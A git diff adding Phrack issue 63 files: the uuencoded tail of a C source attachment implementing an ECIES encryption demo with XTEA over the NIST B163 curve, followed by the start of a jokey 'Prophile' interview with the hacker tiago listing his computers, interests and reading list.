+M<75A;"!T;R`Q("AT:&ES(&ES('1H92!C87-E(&9O<B!A;&P@3DE35"!B:6YA
+M<GD*("`@8W5R=F5S*2X@0V]E9F9I8VEE;G0@)V(G(&ES(&=I=F5N(&EN("=C
+M;V5F9E]B)RX@("<H8F%S95]X+"!B87-E7WDI)PH@("!I<R!A('!O:6YT('1H
+M870@9V5N97)A=&5S(&$@;&%R9V4@<')I;64@;W)D97(@9W)O=7`N("`@("`@
+M("`@("`@("HO"@IE;&5M7W0@8V]E9F9?8BP@8F%S95]X+"!B87-E7WD["@HC
+M9&5F:6YE('!O:6YT7VES7WIE<F\H>"P@>2D@*&)I='-T<E]I<U]C;&5A<BAX
+M*2`F)B!B:71S=')?:7-?8VQE87(H>2DI"B-D969I;F4@<&]I;G1?<V5T7WIE
+M<F\H>"P@>2D@34%#4D\H(&)I='-T<E]C;&5A<BAX*3L@8FET<W1R7V-L96%R
+M*'DI("D*(V1E9FEN92!P;VEN=%]C;W!Y*'@Q+"!Y,2P@>#(L('DR*2!-04-2
+M3R@@8FET<W1R7V-O<'DH>#$L('@R*3L@7`H@("`@("`@("`@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("!B:71S=')?8V]P>2AY,2P@>3(I("D*
+M"B`@("`@("`@("`@("`@("`@("`@("`@("`@("\J(&-H96-K(&EF('E>,B`K
+M('@J>2`]('A>,R`K("IX7C(@*R!C;V5F9E]B(&AO;&1S("HO"FEN="!I<U]P
+M;VEN=%]O;E]C=7)V92AC;VYS="!E;&5M7W0@>"P@8V]N<W0@96QE;5]T('DI
+M"GL*("!E;&5M7W0@82P@8CL*("!I9B`H<&]I;G1?:7-?>F5R;RAX+"!Y*2D*
+M("`@(')E='5R;B`Q.PH@(&9I96QD7VUU;'0H82P@>"P@>"D["B`@9FEE;&1?
+M;75L="AB+"!A+"!X*3L*("!F:65L9%]A9&0H82P@82P@8BD["B`@9FEE;&1?
+M861D*&$L(&$L(&-O969F7V(I.PH@(&9I96QD7VUU;'0H8BP@>2P@>2D["B`@
+M9FEE;&1?861D*&$L(&$L(&(I.PH@(&9I96QD7VUU;'0H8BP@>"P@>2D["B`@
+M<F5T=7)N(&)I='-T<E]I<U]E<75A;"AA+"!B*3L*?0H*=F]I9"!P;VEN=%]D
+M;W5B;&4H96QE;5]T('@L(&5L96U?="!Y*2`@("`@("`@("`@("`@("\J(&1O
+M=6)L92!T:&4@<&]I;G0@*'@L>2D@*B\*>PH@(&EF("@A(&)I='-T<E]I<U]C
+M;&5A<BAX*2D@>PH@("`@96QE;5]T(&$["B`@("!F:65L9%]I;G9E<G0H82P@
+M>"D["B`@("!F:65L9%]M=6QT*&$L(&$L('DI.PH@("`@9FEE;&1?861D*&$L
+M(&$L('@I.PH@("`@9FEE;&1?;75L="AY+"!X+"!X*3L*("`@(&9I96QD7VUU
+M;'0H>"P@82P@82D["B`@("!F:65L9%]A9&0Q*&$I.R`@("`@("`@"B`@("!F
+M:65L9%]A9&0H>"P@>"P@82D["B`@("!F:65L9%]M=6QT*&$L(&$L('@I.PH@
+M("`@9FEE;&1?861D*'DL('DL(&$I.PH@('T*("!E;'-E"B`@("!B:71S=')?
+M8VQE87(H>2D["GT*"B`@("`@("`@("`@("`@("`@("`O*B!A9&0@='=O('!O
+M:6YT<R!T;V=E=&AE<B`H>#$L('DQ*2`Z/2`H>#$L('DQ*2`K("AX,BP@>3(I
+M("HO"G9O:60@<&]I;G1?861D*&5L96U?="!X,2P@96QE;5]T('DQ+"!C;VYS
+M="!E;&5M7W0@>#(L(&-O;G-T(&5L96U?="!Y,BD*>PH@(&EF("@A('!O:6YT
+M7VES7WIE<F\H>#(L('DR*2D@>PH@("`@:68@*'!O:6YT7VES7WIE<F\H>#$L
+M('DQ*2D*("`@("`@<&]I;G1?8V]P>2AX,2P@>3$L('@R+"!Y,BD["B`@("!E
+M;'-E('L*("`@("`@:68@*&)I='-T<E]I<U]E<75A;"AX,2P@>#(I*2!["@EI
+M9B`H8FET<W1R7VES7V5Q=6%L*'DQ+"!Y,BDI"@D@('!O:6YT7V1O=6)L92AX
+M,2P@>3$I.PH)96QS92`*"2`@<&]I;G1?<V5T7WIE<F\H>#$L('DQ*3L*("`@
+M("`@?0H@("`@("!E;'-E('L*"65L96U?="!A+"!B+"!C+"!D.PH)9FEE;&1?
+M861D*&$L('DQ+"!Y,BD["@EF:65L9%]A9&0H8BP@>#$L('@R*3L*"69I96QD
+M7VEN=F5R="AC+"!B*3L*"69I96QD7VUU;'0H8RP@8RP@82D["@EF:65L9%]M
+M=6QT*&0L(&,L(&,I.PH)9FEE;&1?861D*&0L(&0L(&,I.PH)9FEE;&1?861D
+M*&0L(&0L(&(I.PH)9FEE;&1?861D,2AD*3L*"69I96QD7V%D9"AX,2P@>#$L
+M(&0I.PH)9FEE;&1?;75L="AA+"!X,2P@8RD["@EF:65L9%]A9&0H82P@82P@
+M9"D["@EF:65L9%]A9&0H>3$L('DQ+"!A*3L*"6)I='-T<E]C;W!Y*'@Q+"!D
+M*3L*("`@("`@?0H@("`@?0H@('T*?0H*+RHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*B\*"G1Y<&5D968@8FET<W1R7W0@97AP7W0["@IE>'!?
+M="!B87-E7V]R9&5R.PH*("`@("`@("`@("`@("`@("`@("`@("`@("\J('!O
+M:6YT(&UU;'1I<&QI8V%T:6]N('9I82!D;W5B;&4M86YD+6%D9"!A;&=O<FET
+M:&T@*B\*=F]I9"!P;VEN=%]M=6QT*&5L96U?="!X+"!E;&5M7W0@>2P@8V]N
+M<W0@97AP7W0@97AP*0I["B`@96QE;5]T(%@L(%D["B`@:6YT(&D["B`@<&]I
+M;G1?<V5T7WIE<F\H6"P@62D["B`@9F]R*&D@/2!B:71S=')?<VEZ96EN8FET
+M<RAE>'`I("T@,3L@:2`^/2`P.R!I+2TI('L*("`@('!O:6YT7V1O=6)L92A8
+M+"!9*3L*("`@(&EF("AB:71S=')?9V5T8FET*&5X<"P@:2DI"B`@("`@('!O
+M:6YT7V%D9"A8+"!9+"!X+"!Y*3L*("!]"B`@<&]I;G1?8V]P>2AX+"!Y+"!8
+M+"!9*3L*?0H*("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("\J(&1R
+M87<@82!R86YD;VT@=F%L=64@)V5X<"<@=VET:"`Q(#P](&5X<"`\(&X@*B\*
+M=F]I9"!G971?<F%N9&]M7V5X<&]N96YT*&5X<%]T(&5X<"D*>PH@(&-H87(@
+M8G5F6S0@*B!.54U73U)$4UT["B`@:6YT(&9H+"!R+"!S.PH@(&1O('L*("`@
+M(&EF("@H9F@@/2!O<&5N*$1%5E]204Y$3TTL($]?4D1/3DQ9*2D@/"`P*0H@
+M("`@("!&051!3"A$159?4D%.1$]-*3L*("`@(&9O<BAR(#T@,#L@<B`\(#0@
+M*B!.54U73U)$4SL@<B`K/2!S*0H@("`@("!I9B`H*',@/2!R96%D*&9H+"!B
+M=68@*R!R+"`T("H@3E5-5T]21%,@+2!R*2D@/#T@,"D*"49!5$%,*$1%5E]2
+M04Y$3TTI.PH@("`@:68@*&-L;W-E*&9H*2`\(#`I"B`@("`@($9!5$%,*$1%
+M5E]204Y$3TTI.PH@("`@8FET<W1R7VEM<&]R="AE>'`L(&)U9BD["B`@("!F
+M;W(H<B`](&)I='-T<E]S:7IE:6YB:71S*&)A<V5?;W)D97(I("T@,3L@<B`\
+M($Y535=/4D13("H@,S([('(K*RD*("`@("`@8FET<W1R7V-L<F)I="AE>'`L
+M('(I.PH@('T@=VAI;&4H8FET<W1R7VES7V-L96%R*&5X<"DI.PI]"@HO*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ+PH*=F]I9"!85$5!7VEN
+M:71?:V5Y*'5I;G0S,E]T("IK+"!C;VYS="!C:&%R("IK97DI"GL*("!K6S!=
+M(#T@0TA!4E,R24Y4*&ME>2`K(#`I.R!K6S%=(#T@0TA!4E,R24Y4*&ME>2`K
+M(#0I.PH@(&M;,ET@/2!#2$%24S))3E0H:V5Y("L@."D[(&M;,UT@/2!#2$%2
+M4S))3E0H:V5Y("L@,3(I.PI]"@H@("`@("`@("`@("`@("`@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("\J('1H92!85$5!(&)L;V-K
+M(&-I<&AE<B`J+PIV;VED(%A414%?96YC:7!H97)?8FQO8VLH8VAA<B`J9&%T
+M82P@8V]N<W0@=6EN=#,R7W0@*FLI"GL*("!U:6YT,S)?="!S=6T@/2`P+"!D
+M96QT82`](#!X.64S-S<Y8CDL('DL('H["B`@:6YT(&D["B`@>2`]($-(05)3
+M,DE.5"AD871A*3L@>B`]($-(05)3,DE.5"AD871A("L@-"D["B`@9F]R*&D@
+M/2`P.R!I(#P@,S([(&DK*RD@>PH@("`@>2`K/2`H*'H@/#P@-"!>('H@/CX@
+M-2D@*R!Z*2!>("AS=6T@*R!K6W-U;2`F(#-=*3L*("`@('-U;2`K/2!D96QT
+M83L*("`@('H@*ST@*"AY(#P\(#0@7B!Y(#X^(#4I("L@>2D@7B`H<W5M("L@
+M:UMS=6T@/CX@,3$@)B`S72D["B`@?0H@($E.5#)#2$%24RAD871A+"!Y*3L@
+M24Y4,D-(05)3*&1A=&$@*R`T+"!Z*3L*?0H@("`@("`@("`@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@+RH@96YC<GEP
+M="!I;B!#5%(@;6]D92`J+PIV;VED(%A414%?8W1R7V-R>7!T*&-H87(@*F1A
+M=&$L(&EN="!S:7IE+"!C;VYS="!C:&%R("IK97DI(`I["B`@=6EN=#,R7W0@
+M:ULT72P@8W1R(#T@,#L*("!I;G0@;&5N+"!I.PH@(&-H87(@8G5F6SA=.PH@
+M(%A414%?:6YI=%]K97DH:RP@:V5Y*3L*("!W:&EL92AS:7IE*2!["B`@("!)
+M3E0R0TA!4E,H8G5F+"`P*3L@24Y4,D-(05)3*&)U9B`K(#0L(&-T<BLK*3L*
+M("`@(%A414%?96YC:7!H97)?8FQO8VLH8G5F+"!K*3L*("`@(&QE;B`]($U)
+M3B@X+"!S:7IE*3L*("`@(&9O<BAI(#T@,#L@:2`\(&QE;CL@:2LK*0H@("`@
+M("`J9&%T82LK(%X](&)U9EMI73L*("`@('-I>F4@+3T@;&5N.PH@('T*?0H*
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("`@("`@("`O*B!C86QC=6QA=&4@=&AE($-"0R!-04,@*B\*=F]I9"!85$5!
+M7V-B8VUA8RAC:&%R("IM86,L(&-O;G-T(&-H87(@*F1A=&$L(&EN="!S:7IE
+M+"!C;VYS="!C:&%R("IK97DI"GL*("!U:6YT,S)?="!K6S1=.PH@(&EN="!L
+M96XL(&D["B`@6%1%05]I;FET7VME>2AK+"!K97DI.PH@($E.5#)#2$%24RAM
+M86,L(#`I.PH@($E.5#)#2$%24RAM86,@*R`T+"!S:7IE*3L*("!85$5!7V5N
+M8VEP:&5R7V)L;V-K*&UA8RP@:RD["B`@=VAI;&4H<VEZ92D@>PH@("`@;&5N
+M(#T@34E.*#@L('-I>F4I.PH@("`@9F]R*&D@/2`P.R!I(#P@;&5N.R!I*RLI
+M"B`@("`@(&UA8UMI72!>/2`J9&%T82LK.PH@("`@6%1%05]E;F-I<&AE<E]B
+M;&]C:RAM86,L(&LI.PH@("`@<VEZ92`M/2!L96X["B`@?0I]"@H@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@+RH@;6]D:69I960H(2D@
+M1&%V:65S+4UE>65R(&-O;G-T<G5C=&EO;BXJ+PIV;VED(%A414%?9&%V:65S
+M7VUE>65R*&-H87(@*F]U="P@8V]N<W0@8VAA<B`J:6XL(&EN="!I;&5N*0I[
+M"B`@=6EN=#,R7W0@:ULT73L*("!C:&%R(&)U9ELX73L*("!I;G0@:3L*("!M
+M96US970H;W5T+"`P+"`X*3L*("!W:&EL92AI;&5N+2TI('L*("`@(%A414%?
+M:6YI=%]K97DH:RP@:6XI.PH@("`@;65M8W!Y*&)U9BP@;W5T+"`X*3L*("`@
+M(%A414%?96YC:7!H97)?8FQO8VLH8G5F+"!K*3L*("`@(&9O<BAI(#T@,#L@
+M:2`\(#@[(&DK*RD*("`@("`@;W5T6VE=(%X](&)U9EMI73L*("`@(&EN("L]
+M(#$V.PH@('T*?0H*+RHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*B\*"G9O:60@14-)15-?9V5N97)A=&5?:V5Y7W!A:7(H=F]I9"D@("`@("`O
+M*B!G96YE<F%T92!A('!U8FQI8R]P<FEV871E(&ME>2!P86ER("HO"GL*("!C
+M:&%R(&)U9ELX("H@3E5-5T]21%,@*R`Q72P@*F)U9G!T<B`](&)U9B`K($Y5
+M35=/4D13("H@."`M("A$14=2144@*R`S*2`O(#0["B`@96QE;5]T('@L('D[
+M"B`@97AP7W0@:SL*("!G971?<F%N9&]M7V5X<&]N96YT*&LI.PH@('!O:6YT
+M7V-O<'DH>"P@>2P@8F%S95]X+"!B87-E7WDI.PH@('!O:6YT7VUU;'0H>"P@
+M>2P@:RD["B`@<')I;G1F*")(97)E(&ES('EO=7(@;F5W('!U8FQI8R]P<FEV
+M871E(&ME>2!P86ER.EQN(BD["B`@8FET<W1R7W1O7VAE>"AB=68L('@I.R!P
+M<FEN=&8H(E!U8FQI8R!K97DZ("5S.B(L(&)U9G!T<BD[(`H@(&)I='-T<E]T
+M;U]H97@H8G5F+"!Y*3L@<')I;G1F*"(E<UQN(BP@8G5F<'1R*3L*("!B:71S
+M=')?=&]?:&5X*&)U9BP@:RD[('!R:6YT9B@B4')I=F%T92!K97DZ("5S7&XB
+M+"!B=69P='(I.PI]"@H@("`@("`@+RH@8VAE8VL@=&AA="!A(&=I=F5N(&5L
+M96U?="UP86ER(&ES(&$@=F%L:60@<&]I;G0@;VX@=&AE(&-U<G9E("$]("=O
+M)R`J+PII;G0@14-)15-?96UB961D961?<'5B;&EC7VME>5]V86QI9&%T:6]N
+M*&-O;G-T(&5L96U?="!0>"P@8V]N<W0@96QE;5]T(%!Y*0I["B`@<F5T=7)N
+M("AB:71S=')?<VEZ96EN8FET<RA0>"D@/B!$14=2144I('Q\("AB:71S=')?
+M<VEZ96EN8FET<RA0>2D@/B!$14=2144I('Q\"B`@("!P;VEN=%]I<U]Z97)O
+M*%!X+"!0>2D@?'P@(2!I<U]P;VEN=%]O;E]C=7)V92A0>"P@4'DI(#\@+3$@
+M.B`Q.PI]"@H@("`@("`O*B!S86UE('1H:6YG+"!B=70@8VAE8VL@86QS;R!T
+M:&%T("A0>"Q0>2D@9V5N97)A=&5S(&$@9W)O=7`@;V8@;W)D97(@;B`J+PII
+M;G0@14-)15-?<'5B;&EC7VME>5]V86QI9&%T:6]N*&-O;G-T(&-H87(@*E!X
+M+"!C;VYS="!C:&%R("I0>2D*>PH@(&5L96U?="!X+"!Y.PH@(&EF("@H8FET
+M<W1R7W!A<G-E*'@L(%!X*2`\(#`I('Q\("AB:71S=')?<&%R<V4H>2P@4'DI
+M(#P@,"DI"B`@("!R971U<FX@+3$["B`@:68@*$5#24537V5M8F5D9&5D7W!U
+M8FQI8U]K97E?=F%L:61A=&EO;BAX+"!Y*2`\(#`I"B`@("!R971U<FX@+3$[
+M"B`@<&]I;G1?;75L="AX+"!Y+"!B87-E7V]R9&5R*3L*("!R971U<FX@<&]I
+M;G1?:7-?>F5R;RAX+"!Y*2`_(#$@.B`M,3L*?0H*=F]I9"!%0TE%4U]K9&8H
+M8VAA<B`J:S$L(&-H87(@*FLR+"!C;VYS="!E;&5M7W0@6G@L("`@("`O*B!A
+M(&YO;BUS=&%N9&%R9"!+1$8@*B\*"2`@("`@("!C;VYS="!E;&5M7W0@4G@L
+M(&-O;G-T(&5L96U?="!2>2D*>PH@(&EN="!B=69S:7IE(#T@*#,@*B`H-"`J
+M($Y535=/4D13*2`K(#$@*R`Q-2D@)B!^,34["B`@8VAA<B!B=69;8G5F<VEZ
+M95T["B`@;65M<V5T*&)U9BP@,"P@8G5F<VEZ92D["B`@8FET<W1R7V5X<&]R
+M="AB=68L(%IX*3L*("!B:71S=')?97AP;W)T*&)U9B`K(#0@*B!.54U73U)$
+M4RP@4G@I.PH@(&)I='-T<E]E>'!O<G0H8G5F("L@."`J($Y535=/4D13+"!2
+M>2D["B`@8G5F6S$R("H@3E5-5T]21%-=(#T@,#L@6%1%05]D879I97-?;65Y
+M97(H:S$L(&)U9BP@8G5F<VEZ92`O(#$V*3L*("!B=69;,3(@*B!.54U73U)$
+M4UT@/2`Q.R!85$5!7V1A=FEE<U]M97EE<BAK,2`K(#@L(&)U9BP@8G5F<VEZ
+M92`O(#$V*3L*("!B=69;,3(@*B!.54U73U)$4UT@/2`R.R!85$5!7V1A=FEE
+M<U]M97EE<BAK,BP@8G5F+"!B=69S:7IE("\@,38I.PH@(&)U9ELQ,B`J($Y5
+M35=/4D1372`](#,[(%A414%?9&%V:65S7VUE>65R*&LR("L@."P@8G5F+"!B
+M=69S:7IE("\@,38I.PI]"@HC9&5F:6YE($5#24537T]615)(14%$("@X("H@
+M3E5-5T]21%,@*R`X*0H*("`@("`@("`@("`@("`@("`@+RH@14-)15,@96YC
+M<GEP=&EO;CL@=&AE(')E<W5L=&EN9R!C:7!H97(@=&5X="!M97-S86=E('=I
+M;&P@8F4*("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("`@("`H;&5N("L@14-)15-?3U9%4DA%040I(&)Y=&5S(&QO;F<@*B\*=F]I
+M9"!%0TE%4U]E;F-R>7!T:6]N*&-H87(@*FUS9RP@8V]N<W0@8VAA<B`J=&5X
+M="P@:6YT(&QE;BP@"@D)("`@("`@8V]N<W0@8VAA<B`J4'@L(&-O;G-T(&-H
+M87(@*E!Y*0I["B`@96QE;5]T(%)X+"!2>2P@6G@L(%IY.PH@(&-H87(@:S%;
+M,39=+"!K,ELQ-ET["B`@97AP7W0@:SL*("!D;R!["B`@("!G971?<F%N9&]M
+M7V5X<&]N96YT*&LI.PH@("`@8FET<W1R7W!A<G-E*%IX+"!0>"D["B`@("!B
+M:71S=')?<&%R<V4H6GDL(%!Y*3L*("`@('!O:6YT7VUU;'0H6G@L(%IY+"!K
+M*3L*("`@('!O:6YT7V1O=6)L92A:>"P@6GDI.R`@("`@("`@("`@("`@("`@
+M("`@("`@("`@("\J(&-O9F%C=&]R(&@@/2`R(&]N($(Q-C,@*B\*("!]('=H
+M:6QE*'!O:6YT7VES7WIE<F\H6G@L(%IY*2D["B`@<&]I;G1?8V]P>2A2>"P@
+M4GDL(&)A<V5?>"P@8F%S95]Y*3L*("!P;VEN=%]M=6QT*%)X+"!2>2P@:RD[
+M"B`@14-)15-?:V1F*&LQ+"!K,BP@6G@L(%)X+"!2>2D["@H@(&)I='-T<E]E
+M>'!O<G0H;7-G+"!2>"D["B`@8FET<W1R7V5X<&]R="AM<V<@*R`T("H@3E5-
+M5T]21%,L(%)Y*3L*("!M96UC<'DH;7-G("L@."`J($Y535=/4D13+"!T97AT
+M+"!L96XI.PH@(%A414%?8W1R7V-R>7!T*&US9R`K(#@@*B!.54U73U)$4RP@
+M;&5N+"!K,2D["B`@6%1%05]C8F-M86,H;7-G("L@."`J($Y535=/4D13("L@
+M;&5N+"!M<V<@*R`X("H@3E5-5T]21%,L(&QE;BP@:S(I.PI]"@H@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("`@("`@+RH@14-)15,@9&5C<GEP=&EO;B`J+PII;G0@14-)15-?9&5C<GEP
+M=&EO;BAC:&%R("IT97AT+"!C;VYS="!C:&%R("IM<V<L(&EN="!L96XL(`H)
+M"2`@("`@8V]N<W0@8VAA<B`J<')I=FME>2D*>PH@(&5L96U?="!2>"P@4GDL
+M(%IX+"!:>3L*("!C:&%R(&LQ6S$V72P@:S);,39=+"!M86-;.%T["B`@97AP
+M7W0@9#L*("!B:71S=')?:6UP;W)T*%)X+"!M<V<I.PH@(&)I='-T<E]I;7!O
+M<G0H4GDL(&US9R`K(#0@*B!.54U73U)$4RD["B`@:68@*$5#24537V5M8F5D
+M9&5D7W!U8FQI8U]K97E?=F%L:61A=&EO;BA2>"P@4GDI(#P@,"D*("`@(')E
+M='5R;B`M,3L*("!B:71S=')?<&%R<V4H9"P@<')I=FME>2D["B`@<&]I;G1?
+M8V]P>2A:>"P@6GDL(%)X+"!2>2D["B`@<&]I;G1?;75L="A:>"P@6GDL(&0I
+M.PH@('!O:6YT7V1O=6)L92A:>"P@6GDI.R`@("`@("`@("`@("`@("`@("`@
+M("`@("`@("`@+RH@8V]F86-T;W(@:"`](#(@;VX@0C$V,R`J+PH@(&EF("AP
+M;VEN=%]I<U]Z97)O*%IX+"!:>2DI"B`@("!R971U<FX@+3$["B`@14-)15-?
+M:V1F*&LQ+"!K,BP@6G@L(%)X+"!2>2D["B`@"B`@6%1%05]C8F-M86,H;6%C
+M+"!M<V<@*R`X("H@3E5-5T]21%,L(&QE;BP@:S(I.PH@(&EF("AM96UC;7`H
+M;6%C+"!M<V<@*R`X("H@3E5-5T]21%,@*R!L96XL(#@I*0H@("`@<F5T=7)N
+M("TQ.PH@(&UE;6-P>2AT97AT+"!M<V<@*R`X("H@3E5-5T]21%,L(&QE;BD[
+M"B`@6%1%05]C=')?8W)Y<'0H=&5X="P@;&5N+"!K,2D["B`@<F5T=7)N(#$[
+M"GT*"B\J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHO"@IV;VED
+M(&5N8W)Y<'1I;VY?9&5C<GEP=&EO;E]D96UO*&-O;G-T(&-H87(@*G1E>'0L
+M(&-O;G-T(&-H87(@*G!U8FQI8U]X+`H)"0D)8V]N<W0@8VAA<B`J<'5B;&EC
+M7WDL(&-O;G-T(&-H87(@*G!R:79A=&4I"GL*("!I;G0@;&5N(#T@<W1R;&5N
+M*'1E>'0I("L@,3L*("!C:&%R("IE;F-R>7!T960@/2!M86QL;V,H;&5N("L@
+M14-)15-?3U9%4DA%040I.PH@(&-H87(@*F1E8W)Y<'1E9"`](&UA;&QO8RAL
+M96XI.PH*("!P<FEN=&8H(G!L86EN('1E>'0Z("5S7&XB+"!T97AT*3L*("!%
+M0TE%4U]E;F-R>7!T:6]N*&5N8W)Y<'1E9"P@=&5X="P@;&5N+"!P=6)L:6-?
+M>"P@<'5B;&EC7WDI.R`@("\J(&5N8W)Y<'1I;VX@*B\*"B`@:68@*$5#2453
+M7V1E8W)Y<'1I;VXH9&5C<GEP=&5D+"!E;F-R>7!T960L(&QE;BP@<')I=F%T
+M92D@/"`P*2`O*B!D96-R>7!T:6]N("HO"B`@("!P<FEN=&8H(F1E8W)Y<'1I
+M;VX@9F%I;&5D(5QN(BD["B`@96QS90H@("`@<')I;G1F*")A9G1E<B!E;F-R
+M>7!T:6]N+V1E8W)Y<'1I;VXZ("5S7&XB+"!D96-R>7!T960I.PH@(`H@(&9R
+M964H96YC<GEP=&5D*3L*("!F<F5E*&1E8W)Y<'1E9"D["GT*"FEN="!M86EN
+M*"D*>R`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("`@("`@("\J('1H92!C;V5F9FEC:65N=',@9F]R($(Q-C,@*B\*("!B:71S
+M=')?<&%R<V4H<&]L>2P@(C@P,#`P,#`P,#`P,#`P,#`P,#`P,#`P,#`P,#`P
+M,#`P,#`P,#`P,&,Y(BD["B`@8FET<W1R7W!A<G-E*&-O969F7V(L("(R,&$V
+M,#$Y,#=B.&,Y-3-C83$T.#%E8C$P-3$R9C<X-S0T83,R,#5F9"(I.PH@(&)I
+M='-T<E]P87)S92AB87-E7W@L("(S9C!E8F$Q-C(X-F$R9#4W96$P.3DQ,38X
+M9#0Y.30V,S=E.#,T,V4S-B(I.PH@(&)I='-T<E]P87)S92AB87-E7WDL("(P
+M9#4Q9F)C-F,W,6$P,#DT9F$R8V1D-30U8C$Q8S5C,&,W.3<S,C1F,2(I.PH@
+M(&)I='-T<E]P87)S92AB87-E7V]R9&5R+"`B-#`P,#`P,#`P,#`P,#`P,#`P
+M,#`R.3)F93<W93<P8S$R830R,S1C,S,B*3L*"B`@+R]%0TE%4U]G96YE<F%T
+M95]K97E?<&%I<B@I.R`@("`@("`@("`O*B!G96YE<F%T92!A('!U8FQI8R]P
+M<FEV871E(&ME>2!P86ER("HO"@H@(&5N8W)Y<'1I;VY?9&5C<GEP=&EO;E]D
+M96UO*")4:&ES('-E8W)E="!D96UO(&UE<W-A9V4@=VEL;"!B92!%0TE%4R!E
+M;F-R>7!T960B+`H)"0D@("`@("(Q8S4V9#,P,F-F-C0R83AE,6)A-&(T.&-C
+M-&9B93(X-#5E93,R9&-E-R(L(`H)"0D@("`@("(T-68T-F5B,S`S961F,F4V
+M,F8W-&)D-C@S-CAD.3<Y93(V-65E,V,P,R(L"@D)"2`@("`@(C!E,3!E-S@W
+M,#,V.30Q939C-SAD868X83!E.&4Q9&)F86,V.&4R-F0R(BD["B`@<F5T=7)N
+M(#`["GT*"B\J(&8X-F,Y,C`S.6,Y.3)D,F0R8F0R8C@U8S@X,#=A8S)F-V%F
+)-3=C-6,@*B\*
+`
+end
+size 15669
+
+f86c92039c992d2d2bd2b85c8807ac2f7af57c5c
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack63/4.txt b/phrack63/4.txt
new file mode 100644
index 0000000..4ac1428
--- /dev/null
+++ b/phrack63/4.txt
@@ -0,0 +1,808 @@
+phrack.org:~# cat .bash_history
+
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3f, Phile #0x04 of 0x14
+
+ |=---------------=[ P R O P H I L E   O N   T I A G O ]=-----------------=|
+ |=-----------------------------------------------------------------------=|
+ |=------------------------=[ Phrack Staff ]=-----------------------------=|
+                                                                                
+ |=---=[ Specification
+                                                                                
+                   Handle: tiago
+                      AKA: module
+            Handle origin: Lemme call my mom and ask, just a second...
+                           ok; "it was between pedro henrique and tiago,
+			   but after looking for reasons that would define
+			   we decided to throw a coin: head".
+                catch him: By producing whatsoever sign/event pair that
+		           would take my attention and get you the expected
+			   feedback.
+         Age of your body: 24
+              Produced in: Southeastern Coconutland
+          Height & Weight: 178cm, 70kg
+                     Urlz: .
+                Computers: SGI Indy (R4600PC at 100MHz, 128MB RAM, 2GB
+		           hdd), Sun Ultra-10 (UltraSparc IIi at 440MHz,
+			   1GB RAM, 9GB hdd), Toshiba Portege 4005
+			   laptop (Intel P3 at 800MHz, 512MB RAM, 20GB
+			   hdd).
+                Member of: Teletubbies
+                 Projects: Many fields in computer theory. Software
+		           Engineering subjects such as: Abstract
+			   Interpretation, Program Transformation, Reverse
+			   Engineering, etc. Applied cryptography at work.
+			   Enjoy hardware design, operating system
+			   design/implementation hacks, software
+			   design/implementation security related
+			   exploitation. Anything that actually takes
+			   my attention for whatever reason.
+
+ |=---=[ Favorite things
+                                                                                
+                                                                                
+           Women: je veux un petite pipe, s'il vous plait 
+            Cars: I don't know how to drive                           
+           Foods: taco-taco brrrito-brritooo                                   
+         Alcohol: combined with Benflogin                        
+           Music: Symantec iz in tha houuuuuuuuuse!!!!! c'mon
+	          c'mooooooon sing sing! see tha solution! Symanteeeec,
+		  revoooolutiooooon... we give yooooooouuu... sweet
+		  soluttiooooonnss \o\ /o\ \o\ /o/ We! got your personal
+		  firewalllz! ... dunt dunt..
+		  -> http://www.phrack.org/symantec_fancyness.mp3,
+		     por favor.
+          Movies: GOBBLES.avi
+ Books & Authors: HUHU, books are fancy q:D -- stuff that have been
+                  remarkable on my near past. still reading some:                
+		  . Whom the Gods Love: The Story of Evariste Galois,
+		    infeld, (spanish, by Siglo Veintiuno Editores);
+		  . Computer Architecture: A Quantitative Approach,
+                    hennessy & patterson (english, by MK);
+		  . Comprehensive Textbook of Psychiatry, kaplan &
+		    sadock (english, LWW);
+		  . The Art of Computer Programming, vol. 1-3, knuth
+		    (3rd Ed., Addison Wesley) -- <3 dutchy;
+		  . Systems and Theories in Psychology, marx & hillix
+		    (portuguese, by Alvaro Cabral);
+		  . Cognitive Psychology and its Implications, anderson
+		    (portuguese, by LTC);
+		  . Axiomatic Set Theory, bernays (english, by Dover,
+		    2nd Ed., 1968-1991);
+		  . La Fine della Modernit, vattimo (portuguese, by
+		    Martins Fontes);
+		  . Grundlegung zur Metaphysik der Sitten, kant (english,
+		    by H.J. Paton);
+		  . Einfhrung in die Metaphysik, heidegger (english, by
+		    Gregory Fried and Richard Polt);
+		  . Principia Mathematica, russel (english, by Cambrige
+		    Mathematical Library, 2nd Ed., 1927-1997);
+		  . Uber formal unentscheidbare Satze der Principia
+		    Mathematica und verwandter Systeme, I, gdel (english,
+		    by B. Meltzer);
+		  . Tractatus Logico-Philosoficus, wittgenstein (english,
+		    by Routledge & Kegan Paul);
